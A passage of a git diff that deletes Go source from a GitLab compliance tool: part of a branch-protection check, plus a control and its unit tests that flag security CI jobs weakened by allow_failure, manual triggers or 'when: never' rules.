- break
- }
- }
- if !matchesPattern && (!defaultMustBeProtected || !branch.Default) {
- continue
- }
-
- // Check compliance issues
- issueData := BranchProtectionIssue{
- Code: CodeBranchNonCompliant,
- DocURL: CodeBranchNonCompliant.DocURL(),
- Type: "non_compliant",
- BranchName: branch.BranchName,
- AllowForcePush: branch.AllowForcePush,
- CodeOwnerApprovalRequired: branch.CodeOwnerApprovalRequired,
- MinMergeAccessLevel: branch.MinMergeAccessLevel,
- AuthorizedMinMergeAccessLevel: minMergeAccessLevel,
- MinPushAccessLevel: branch.MinPushAccessLevel,
- AuthorizedMinPushAccessLevel: minPushAccessLevel,
- }
-
- hasIssue := false
-
- // Check if forcePushAllowed is not respected
- if !allowForcePush && branch.AllowForcePush {
- issueData.AllowForcePushDisplay = true
- hasIssue = true
- }
-
- // Check if codeOwnerApprovalRequired is not respected
- if codeOwnerApprovalRequired && !branch.CodeOwnerApprovalRequired {
- issueData.CodeOwnerApprovalRequiredDisplay = true
- hasIssue = true
- }
-
- // Check if min access level is not respected for merge
- if branch.MinMergeAccessLevel != 0 && (minMergeAccessLevel == 0 || minMergeAccessLevel > branch.MinMergeAccessLevel) {
- issueData.MinMergeAccessLevelDisplay = true
- hasIssue = true
- }
-
- // Check if min access level is not respected for push
- if branch.MinPushAccessLevel != 0 && (minPushAccessLevel == 0 || minPushAccessLevel > branch.MinPushAccessLevel) {
- issueData.MinPushAccessLevelDisplay = true
- hasIssue = true
- }
-
- // Create issue if needed
- if hasIssue {
- nonCompliantCount++
-
- // Add data with compliance details
- branchData.AllowForcePush = issueData.AllowForcePush
- branchData.CodeOwnerApprovalRequired = issueData.CodeOwnerApprovalRequired
- branchData.MinMergeAccessLevel = issueData.MinMergeAccessLevel
- branchData.MinPushAccessLevel = issueData.MinPushAccessLevel
- branchData.AuthorizedMinMergeAccessLevel = issueData.AuthorizedMinMergeAccessLevel
- branchData.AuthorizedMinPushAccessLevel = issueData.AuthorizedMinPushAccessLevel
-
- issues = append(issues, issueData)
- }
-
- // Always add data for protected branches, even if compliant
- if hasIssue || len(data) == 0 || data[len(data)-1].BranchName != branchData.BranchName {
- data = append(data, branchData)
- }
- }
-
- // Calculate metrics
- metrics.Branches = len(protectionData.Branches)
- metrics.BranchesToProtect = len(branchesToProtect)
- metrics.UnprotectedBranches = unprotectedCount
- metrics.NonCompliantBranches = nonCompliantCount
- metrics.TotalProtectedBranches = totalProtectedBranches
- if unprotectedCount == 0 && nonCompliantCount == 0 && len(branchesToProtect) > 0 {
- metrics.ProjectsCorrectlyProtected = 1
- }
-
- // Calculate compliance
- if len(issues) == 0 {
- compliance = 100.0
- } else {
- logger.WithField("issueCount", len(issues)).Debug("Issues found, compliance is 0")
- }
-
- return &GitlabBranchProtectionResult{
- Enabled: true,
- Compliance: compliance,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- Data: data,
- Metrics: metrics,
- Issues: issues,
- }
-}
-
-// checkBranches determines which branches need protection and their current protection status
-func (c *GitlabBranchProtectionControl) checkBranches(
- branches []string,
- branchProtections []gitlab.BranchProtection,
- defaultBranch string,
-) map[string]*BranchProtectionCompliance {
-
- // Get config values
- defaultMustBeProtected := false
- if c.config.DefaultMustBeProtected != nil {
- defaultMustBeProtected = *c.config.DefaultMustBeProtected
- }
-
- // Filter repo branches by patterns
- branchesToProtect := map[string]*BranchProtectionCompliance{}
-
- // First, collect all branches that need protection based on configuration
- if defaultMustBeProtected {
- branchesToProtect[defaultBranch] = &BranchProtectionCompliance{
- BranchName: defaultBranch,
- Default: true,
- Protected: false,
- }
- }
-
- for _, branch := range branches {
- for _, pattern := range c.config.NamePatterns {
- if wildcard.Match(pattern, branch) {
- if _, exists := branchesToProtect[branch]; !exists {
- branchesToProtect[branch] = &BranchProtectionCompliance{
- BranchName: branch,
- Default: branch == defaultBranch,
- Protected: false,
- }
- }
- }
- }
- }
-
- // Set all branches to protect with the least permissive protection
- // configuration to simplify the check in the next loop while keeping the
- // most permissive rule in case of multiple match
- for _, branch := range branchesToProtect {
- branch.AllowForcePush = false
- branch.CodeOwnerApprovalRequired = true
- branch.MinMergeAccessLevel = gitlab.AccessLevelNo
- branch.MinPushAccessLevel = gitlab.AccessLevelNo
- branch.PushAccessLevels = []gitlab.BranchProtectionAccessLevel{}
- branch.MergeAccessLevels = []gitlab.BranchProtectionAccessLevel{}
- }
-
- // For each branch to protect: loop over all protection patterns and try
- // to match following GitLab pattern matching rules:
- // - Only wildcard "*" can be used
- // - Matching is case-sensitive
-
- // NOTE: here, we use the wildcard lib matching (*, ?, .) pattern which is
- // not the same as GitLab. It can produce wrong results in case of
- // interrogation mark or dots present in protection name pattern (they are
- // not interpreted by GitLab but we interpret them)
-
- // NOTE: if a branch matches 2 protection rules, the most permissive is
- // applied (see
- // https://docs.gitlab.com/ee/user/project/repository/branches/protected.html#when-a-branch-matches-multiple-rules)
-
- for _, branch := range branchesToProtect {
- for _, branchProtection := range branchProtections {
-
- // If protection does not match with branch, continue
- if !wildcard.Match(branchProtection.ProtectionPattern, branch.BranchName) {
- continue
- }
-
- // Add protection data
- branch.Protected = true
-
- // NOTE: if several protection patterns match for the same branch,
- // this field will be overridden
- branch.ProtectionPattern = branchProtection.ProtectionPattern
-
- // Add protection rules while always keeping the most permissive
-
- // If allow force push currently set in the branch is false, it
- // means that it's not to the most permissive state, so we can
- // apply current protection
- if !branch.AllowForcePush {
- branch.AllowForcePush = branchProtection.AllowForcePush
- }
-
- // If code owner approval required currently set in the branch is
- // true, it means that it's not to the most permissive state, so we
- // can apply current protection
- if branch.CodeOwnerApprovalRequired {
- branch.CodeOwnerApprovalRequired = branchProtection.CodeOwnerApprovalRequired
- }
-
- // Merge access level
- for _, mergeAccessLevel := range branchProtection.MergeAccessLevels {
-
- // Add it to branch for data
- branch.MergeAccessLevels = append(branch.MergeAccessLevels, mergeAccessLevel)
-
- // If merge access level from the protection rule is different
- // than 0 (No one) and smaller than the minimum currently set
- // in branch, we take it as min access level as it's equal or
- // more permissive to the current min
- if branch.MinMergeAccessLevel == 0 || ((mergeAccessLevel.AccessLevel != gitlab.AccessLevelNo) && (mergeAccessLevel.AccessLevel < branch.MinMergeAccessLevel)) {
- branch.MinMergeAccessLevel = mergeAccessLevel.AccessLevel
- }
- }
-
- // Push access level
- for _, pushAccessLevel := range branchProtection.PushAccessLevels {
-
- // Add it to branch for data
- branch.PushAccessLevels = append(branch.PushAccessLevels, pushAccessLevel)
-
- // If push access level from the protection rule is different than
- // 0 (No one) and smaller than the minimum currently set in branch,
- // we apply it as min access level as it's equal or more permissive
- // to the current min
- if branch.MinPushAccessLevel == 0 || ((pushAccessLevel.AccessLevel != gitlab.AccessLevelNo) && (pushAccessLevel.AccessLevel < branch.MinMergeAccessLevel)) {
- branch.MinPushAccessLevel = pushAccessLevel.AccessLevel
- }
- }
- }
- }
-
- return branchesToProtect
-}
diff --git a/control/controlGitlabSecurityJobsWeakened.go b/control/controlGitlabSecurityJobsWeakened.go
deleted file mode 100644
index 5ef49f1..0000000
--- a/control/controlGitlabSecurityJobsWeakened.go
+++ /dev/null
@@ -1,383 +0,0 @@
-package control
-
-import (
- "fmt"
- "path/filepath"
- "strings"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
- "gopkg.in/yaml.v2"
-)
-
-const ControlTypeGitlabSecurityJobsWeakenedVersion = "0.1.0"
-
-//////////////////
-// Control conf //
-//////////////////
-
-// GitlabSecurityJobsWeakenedConf holds the runtime configuration for this control
-type GitlabSecurityJobsWeakenedConf struct {
- Enabled bool
- SecurityJobPatterns []string
- AllowFailureCheck bool
- RulesCheck bool
- WhenManualCheck bool
-}
-
-// GetConf loads configuration from PlumberConfig
-func (p *GitlabSecurityJobsWeakenedConf) GetConf(plumberConfig *configuration.PlumberConfig) error {
- if plumberConfig == nil {
- p.Enabled = false
- return nil
- }
-
- cfg := plumberConfig.GetSecurityJobsMustNotBeWeakenedConfig()
- if cfg == nil {
- l.Debug("securityJobsMustNotBeWeakened control configuration is missing from .plumber.yaml file, skipping")
- p.Enabled = false
- return nil
- }
-
- if cfg.Enabled == nil {
- return fmt.Errorf("securityJobsMustNotBeWeakened.enabled field is required in .plumber.yaml config file")
- }
-
- p.Enabled = cfg.IsEnabled()
- p.SecurityJobPatterns = cfg.SecurityJobPatterns
-
- // Sub-control defaults: allowFailure off, rules on, whenManual on
- p.AllowFailureCheck = cfg.AllowFailureMustBeFalse.IsEnabled(false)
- p.RulesCheck = cfg.RulesMustNotBeRedefined.IsEnabled(true)
- p.WhenManualCheck = cfg.WhenMustNotBeManual.IsEnabled(true)
-
- l.WithFields(logrus.Fields{
- "enabled": p.Enabled,
- "patterns": p.SecurityJobPatterns,
- "allowFailureCheck": p.AllowFailureCheck,
- "rulesCheck": p.RulesCheck,
- "whenManualCheck": p.WhenManualCheck,
- }).Debug("securityJobsMustNotBeWeakened control configuration loaded from .plumber.yaml file")
-
- return nil
-}
-
-////////////////////////////
-// Control data & metrics //
-////////////////////////////
-
-// GitlabSecurityJobsWeakenedMetrics holds metrics about security job weakening detection
-type GitlabSecurityJobsWeakenedMetrics struct {
- SecurityJobsFound uint `json:"securityJobsFound"`
- WeakenedJobs uint `json:"weakenedJobs"`
-}
-
-// GitlabSecurityJobsWeakenedResult holds the result of the security jobs weakened control
-type GitlabSecurityJobsWeakenedResult struct {
- Issues []GitlabSecurityJobsWeakenedIssue `json:"issues"`
- Metrics GitlabSecurityJobsWeakenedMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabSecurityJobsWeakenedIssue represents a weakened security job
-type GitlabSecurityJobsWeakenedIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- SubControl string `json:"subControl"` // "allowFailureMustBeFalse", "rulesMustNotBeRedefined", "whenMustNotBeManual"
- Detail string `json:"detail"`
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Run executes the security jobs weakening detection control
-func (p *GitlabSecurityJobsWeakenedConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabSecurityJobsWeakenedResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabSecurityJobsWeakened",
- "controlVersion": ControlTypeGitlabSecurityJobsWeakenedVersion,
- })
- l.Info("Start security jobs weakening detection control")
-
- result := &GitlabSecurityJobsWeakenedResult{
- Issues: []GitlabSecurityJobsWeakenedIssue{},
- Metrics: GitlabSecurityJobsWeakenedMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabSecurityJobsWeakenedVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Security jobs weakening detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if !p.AllowFailureCheck && !p.RulesCheck && !p.WhenManualCheck {
- l.Info("All sub-controls are disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if !pipelineOriginData.CiValid || pipelineOriginData.CiMissing {
- result.Compliance = 0.0
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Build set of security job names from two sources:
- // 1. Jobs originating from known security templates
- // 2. Jobs matching user-configured name patterns
- securityJobs := p.identifySecurityJobs(pipelineOriginData)
-
- result.Metrics.SecurityJobsFound = uint(len(securityJobs))
-
- if len(securityJobs) == 0 {
- l.Info("No security jobs found in pipeline")
- return result
- }
-
- // Track which jobs have been flagged to avoid double-counting in metrics
- weakenedSet := make(map[string]bool)
-
- // Sub-control 1: allowFailureMustBeFalse
- if p.AllowFailureCheck {
- for jobName := range securityJobs {
- jobContent, exists := mergedConf.GitlabJobs[jobName]
- if !exists {
- continue
- }
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil || job == nil {
- continue
- }
- if isAllowFailureTrue(job.AllowFailure) {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "allowFailureMustBeFalse",
- Detail: "allow_failure is true (should be false for blocking security)",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has allow_failure: true")
- }
- }
- }
-
- // Sub-control 2: rulesMustNotBeRedefined
- // Check the unmerged Conf (raw .gitlab-ci.yml) and JobHardcodedContent for rules overrides
- if p.RulesCheck {
- for jobName := range securityJobs {
- var rawContent interface{}
- found := false
-
- // First check raw .gitlab-ci.yml (unmerged Conf)
- if pipelineOriginData.Conf != nil {
- if content, exists := pipelineOriginData.Conf.GitlabJobs[jobName]; exists {
- rawContent = content
- found = true
- }
- }
-
- // Fall back to JobHardcodedContent (covers local overrides)
- if !found {
- if content, exists := pipelineOriginData.JobHardcodedContent[jobName]; exists {
- rawContent = content
- found = true
- }
- }
-
- if !found {
- continue
- }
-
- rulesOverride := extractRulesFromRawContent(rawContent)
- if rulesOverride == nil {
- continue
- }
-
- for _, rule := range rulesOverride {
- whenVal := strings.ToLower(strings.TrimSpace(rule.When))
- if whenVal == "never" {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "rulesMustNotBeRedefined",
- Detail: "rules overridden with 'when: never', job will not run",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has rules overridden with when: never")
- break
- }
- if whenVal == "manual" {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "rulesMustNotBeRedefined",
- Detail: "rules overridden with 'when: manual', job requires manual trigger",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has rules overridden with when: manual")
- break
- }
- }
- }
- }
-
- // Sub-control 3: whenMustNotBeManual
- if p.WhenManualCheck {
- for jobName := range securityJobs {
- jobContent, exists := mergedConf.GitlabJobs[jobName]
- if !exists {
- continue
- }
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil || job == nil {
- continue
- }
- if isWhenManual(job.When) {
- result.Issues = append(result.Issues, GitlabSecurityJobsWeakenedIssue{
- Code: CodeSecurityJobWeakened,
- DocURL: CodeSecurityJobWeakened.DocURL(),
- JobName: jobName,
- SubControl: "whenMustNotBeManual",
- Detail: "when set to 'manual', job requires manual trigger",
- })
- weakenedSet[jobName] = true
- l.WithField("job", jobName).Debug("Security job has when: manual")
- }
- }
- }
-
- result.Metrics.WeakenedJobs = uint(len(weakenedSet))
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Weakened security jobs found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "securityJobsFound": result.Metrics.SecurityJobsFound,
- "weakenedJobs": result.Metrics.WeakenedJobs,
- "compliance": result.Compliance,
- }).Info("Security jobs weakening detection control completed")
-
- return result
-}
-
-// identifySecurityJobs returns a set of job names that are considered security jobs.
-// A job qualifies if its name matches any of the user-configured securityJobPatterns.
-func (p *GitlabSecurityJobsWeakenedConf) identifySecurityJobs(data *collector.GitlabPipelineOriginData) map[string]bool {
- securityJobs := make(map[string]bool)
-
- if len(p.SecurityJobPatterns) == 0 || data.MergedConf == nil {
- return securityJobs
- }
-
- for jobName := range data.MergedConf.GitlabJobs {
- if matchesAnyPattern(jobName, p.SecurityJobPatterns) {
- securityJobs[jobName] = true
- }
- }
-
- return securityJobs
-}
-
-// matchesAnyPattern checks if a job name matches any of the provided glob patterns
-func matchesAnyPattern(jobName string, patterns []string) bool {
- for _, pattern := range patterns {
- matched, err := filepath.Match(pattern, jobName)
- if err == nil && matched {
- return true
- }
- }
- return false
-}
-
-// isAllowFailureTrue checks if the allow_failure field is set to true.
-// allow_failure can be a bool, a string "true", or a map with exit_codes.
-func isAllowFailureTrue(af interface{}) bool {
- if af == nil {
- return false
- }
- switch v := af.(type) {
- case bool:
- return v
- case string:
- return strings.ToLower(strings.TrimSpace(v)) == "true"
- case map[interface{}]interface{}:
- // allow_failure: {exit_codes: [1, 2]} is a partial allow, treat as true
- return true
- }
- return false
-}
-
-// isWhenManual checks if the when field is set to "manual"
-func isWhenManual(when interface{}) bool {
- if when == nil {
- return false
- }
- switch v := when.(type) {
- case string:
- return strings.ToLower(strings.TrimSpace(v)) == "manual"
- }
- return false
-}
-
-// extractRulesFromRawContent extracts the rules from a raw job content (interface{})
-// and parses them into a slice of Rule structs.
-func extractRulesFromRawContent(rawContent interface{}) []gitlab.Rule {
- contentMap, ok := rawContent.(map[interface{}]interface{})
- if !ok {
- // Try string-keyed map (from JSON or some YAML parsers)
- if strMap, ok2 := rawContent.(map[string]interface{}); ok2 {
- contentMap = make(map[interface{}]interface{}, len(strMap))
- for k, v := range strMap {
- contentMap[k] = v
- }
- } else {
- return nil
- }
- }
-
- rulesRaw, exists := contentMap["rules"]
- if !exists {
- return nil
- }
-
- // Marshal and unmarshal to get properly typed rules
- yamlData, err := yaml.Marshal(rulesRaw)
- if err != nil {
- return nil
- }
-
- var rules []gitlab.Rule
- if err := yaml.Unmarshal(yamlData, &rules); err != nil {
- return nil
- }
-
- return rules
-}
diff --git a/control/controlGitlabSecurityJobsWeakened_test.go b/control/controlGitlabSecurityJobsWeakened_test.go
deleted file mode 100644
index 6f6b779..0000000
--- a/control/controlGitlabSecurityJobsWeakened_test.go
+++ /dev/null
@@ -1,557 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-// helper to build pipeline origin data with merged conf and origins
-func buildSecurityJobsPipelineData(
- mergedJobs map[string]interface{},
- rawJobs map[string]interface{},
- origins []collector.GitlabPipelineOriginDataFull,
-) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GitlabJobs: mergedJobs,
- }
- var rawConf *gitlab.GitlabCIConf
- if rawJobs != nil {
- rawConf = &gitlab.GitlabCIConf{
- GitlabJobs: rawJobs,
- }
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- Conf: rawConf,
- CiValid: true,
- CiMissing: false,
- Origins: origins,
- JobMap: make(map[string]*collector.GitlabPipelineJobData),
- JobHardcodedMap: make(map[string]bool),
- JobHardcodedContent: make(map[string]interface{}),
- }
-}
-
-func TestSecurityJobsWeakened_Disabled(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: false,
- }
- data := buildSecurityJobsPipelineData(nil, nil, nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestSecurityJobsWeakened_AllSubControlsDisabled(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: false,
- }
- data := buildSecurityJobsPipelineData(nil, nil, nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when all sub-controls disabled")
- }
-}
-
-func TestSecurityJobsWeakened_CiInvalid(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- WhenManualCheck: true,
- }
- data := &collector.GitlabPipelineOriginData{
- CiValid: false,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 for invalid CI, got %v", result.Compliance)
- }
-}
-
-func TestSecurityJobsWeakened_NoSecurityJobs(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- WhenManualCheck: true,
- }
- mergedJobs := map[string]interface{}{
- "build": map[interface{}]interface{}{
- "script": "echo build",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Skipped {
- t.Fatal("expected control to run, not be skipped")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when no security jobs found, got %v", result.Compliance)
- }
- if result.Metrics.SecurityJobsFound != 0 {
- t.Fatalf("expected 0 security jobs found, got %d", result.Metrics.SecurityJobsFound)
- }
-}
-
-func TestSecurityJobsWeakened_AllowFailureTrue(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast"},
- AllowFailureCheck: true,
- RulesCheck: false,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": true,
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].SubControl != "allowFailureMustBeFalse" {
- t.Fatalf("expected sub-control allowFailureMustBeFalse, got %s", result.Issues[0].SubControl)
- }
- if result.Issues[0].JobName != "semgrep-sast" {
- t.Fatalf("expected job semgrep-sast, got %s", result.Issues[0].JobName)
- }
-}
-
-func TestSecurityJobsWeakened_AllowFailureFalse_NoIssue(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast"},
- AllowFailureCheck: true,
- RulesCheck: false,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": false,
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
-}
-
-func TestSecurityJobsWeakened_WhenManual(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"container_scanning"},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "container_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].SubControl != "whenMustNotBeManual" {
- t.Fatalf("expected sub-control whenMustNotBeManual, got %s", result.Issues[0].SubControl)
- }
-}
-
-func TestSecurityJobsWeakened_RulesWhenNever(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"secret_detection"},
- AllowFailureCheck: false,
- RulesCheck: true,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- rawJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "never",
- },
- },
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, rawJobs, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].SubControl != "rulesMustNotBeRedefined" {
- t.Fatalf("expected sub-control rulesMustNotBeRedefined, got %s", result.Issues[0].SubControl)
- }
- if result.Issues[0].JobName != "secret_detection" {
- t.Fatalf("expected job secret_detection, got %s", result.Issues[0].JobName)
- }
-}
-
-func TestSecurityJobsWeakened_RulesWhenManual(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"secret_detection"},
- AllowFailureCheck: false,
- RulesCheck: true,
- WhenManualCheck: false,
- }
-
- mergedJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- rawJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "manual",
- "allow_failure": true,
- },
- },
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, rawJobs, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestSecurityJobsWeakened_NoPatterns(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Metrics.SecurityJobsFound != 0 {
- t.Fatalf("expected 0 security jobs when no patterns configured, got %d", result.Metrics.SecurityJobsFound)
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when no patterns configured, got %v", result.Compliance)
- }
-}
-
-func TestSecurityJobsWeakened_MultiplePatternMatches(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast", "semgrep-*"},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- // Job matches both patterns but should only appear once
- if result.Metrics.SecurityJobsFound != 1 {
- t.Fatalf("expected 1 security job (deduped), got %d", result.Metrics.SecurityJobsFound)
- }
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
-}
-
-func TestSecurityJobsWeakened_MultipleSubControlIssues(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast", "container_scanning", "secret_detection"},
- AllowFailureCheck: true,
- RulesCheck: true,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": true,
- },
- "container_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- rawJobs := map[string]interface{}{
- "secret_detection": map[interface{}]interface{}{
- "rules": []interface{}{
- map[interface{}]interface{}{
- "when": "never",
- },
- },
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, rawJobs, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
- if len(result.Issues) != 3 {
- t.Fatalf("expected 3 issues, got %d", len(result.Issues))
- }
- if result.Metrics.WeakenedJobs != 3 {
- t.Fatalf("expected 3 weakened jobs, got %d", result.Metrics.WeakenedJobs)
- }
-}
-
-func TestSecurityJobsWeakened_CleanConfig(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"*-sast", "secret_detection"},
- AllowFailureCheck: true,
- RulesCheck: true,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "semgrep-sast": map[interface{}]interface{}{
- "script": "/analyzer run",
- "allow_failure": false,
- "when": "on_success",
- },
- "secret_detection": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected 0 issues, got %d", len(result.Issues))
- }
- if result.Metrics.SecurityJobsFound != 2 {
- t.Fatalf("expected 2 security jobs found, got %d", result.Metrics.SecurityJobsFound)
- }
-}
-
-func TestSecurityJobsWeakened_WildcardPatterns(t *testing.T) {
- conf := &GitlabSecurityJobsWeakenedConf{
- Enabled: true,
- SecurityJobPatterns: []string{"gemnasium-*"},
- AllowFailureCheck: false,
- RulesCheck: false,
- WhenManualCheck: true,
- }
-
- mergedJobs := map[string]interface{}{
- "gemnasium-dependency_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- "when": "manual",
- },
- "gemnasium-maven-dependency_scanning": map[interface{}]interface{}{
- "script": "/analyzer run",
- },
- }
- data := buildSecurityJobsPipelineData(mergedJobs, nil, nil)
-
- result := conf.Run(data)
-
- if result.Metrics.SecurityJobsFound != 2 {
